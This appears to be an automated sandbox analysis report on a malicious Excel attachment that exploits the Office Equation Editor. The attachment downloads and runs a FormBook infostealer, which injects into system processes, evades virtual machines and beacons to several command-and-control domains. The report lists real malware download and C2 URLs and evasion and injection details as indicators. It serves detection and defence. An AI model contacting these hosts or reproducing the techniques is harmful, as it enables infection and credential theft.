          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010EA0FF push es; iretd 5_2_010EA151
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010E9A2A push es; retf 5_2_010E9A37
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010E9767 push 3A000004h; retf 0000h5_2_010E976C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252DFA1 push ecx; ret 7_2_0252DFB4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F53E0 push es; retf 7_2_000F53E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB7D5 push eax; ret 7_2_000FB828
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB82B push eax; ret 7_2_000FB892
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB822 push eax; ret 7_2_000FB828
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB88C push eax; ret 7_2_000FB892
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F5C4E push ebp; ret 7_2_000F5C57
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FCD74 push eax; ret 7_2_000FCD76
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F4EAF pushad ; ret 7_2_000F4EB0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FCF70 pushad ; ret 7_2_000FCF74
          Source: initial sampleStatic PE information: section name: .text entropy: 7.09183457807
          Source: initial sampleStatic PE information: section name: .text entropy: 7.09183457807
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\Pcportk28.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\Pcportk28.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\Public\Pcportk28.exe TID: 836Thread sleep time: -34932s >= -30000sJump to behavior
          Source: C:\Users\Public\Pcportk28.exe TID: 2128Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exe TID: 672Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeLast function: Thread delayed
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 34932Jump to behavior
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmpBinary or memory string: +Qemu
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\Pcportk28.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h]5_2_008626F8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h]7_2_025326F8
          Source: C:\Users\Public\Pcportk28.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00409B40 LdrLoadDll,5_2_00409B40
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.executive-air.net
          Source: C:\Windows\explorer.exeDomain query: www.bitcointradel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.73 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.freeadakahamazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fisioletsgo.com
          Source: C:\Windows\explorer.exeDomain query: www.luckyfandom.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.34.21 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\Pcportk28.exeSection unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\Pcportk28.exeMemory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\Pcportk28.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\Pcportk28.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\Pcportk28.exeQueries volume information: C:\Users\Public\Pcportk28.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\Pcportk28.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Pcportk28.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsDLL Side-Loading1Modify Registry1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553293 Sample: SWIFT - Copy - Copy.xlsx Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 15 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 53 12 2->15         started        process3 dnsIp4 44 mikeloayza.com 131.153.37.4, 443, 49167, 49168 SSASN2US United States 10->44 32 C:\Users\user\AppData\Local\...\i4L[1].exe, PE32 10->32 dropped 34 C:\Users\Public\Pcportk28.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 Pcportk28.exe 1 5 10->17         started        36 C:\Users\user\...\~$SWIFT - Copy - Copy.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 Pcportk28.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.luckyfandom.com 118.67.131.217, 49173, 80 CLEAR-AS-APClearNetworksPtyLtdAU Korea Republic of 23->38 40 bitcointradel.com 162.0.209.73, 49171, 80 ACPCA Canada 23->40 42 5 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 wininit.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SWIFT - Copy - Copy.xlsx100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Pcportk28.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.Pcportk28.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          mikeloayza.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://mikeloayza.com/E9/i4L.exe100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          www.healingandhealthy.com/i6ro/0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          https://mikeloayza.com/E9/i4L.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.luckyfandom.com
          		118.67.131.217
          		truetrue
            		unknown
            mikeloayza.com
            		131.153.37.4
            		truetrueunknown
            bitcointradel.com
            		162.0.209.73
            		truetrue
              		unknown
              executive-air.net
              		34.102.136.180
              		truefalse
                		unknown
                www.fisioletsgo.com
                		216.239.34.21
                		truefalse
                  		unknown
                  www.executive-air.net
                  		unknown
                  		unknowntrue
                    		unknown
                    www.bitcointradel.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.freeadakahamazon.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://mikeloayza.com/E9/i4L.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684ptrue
                        • Avira URL Cloud: safe
                        		unknown
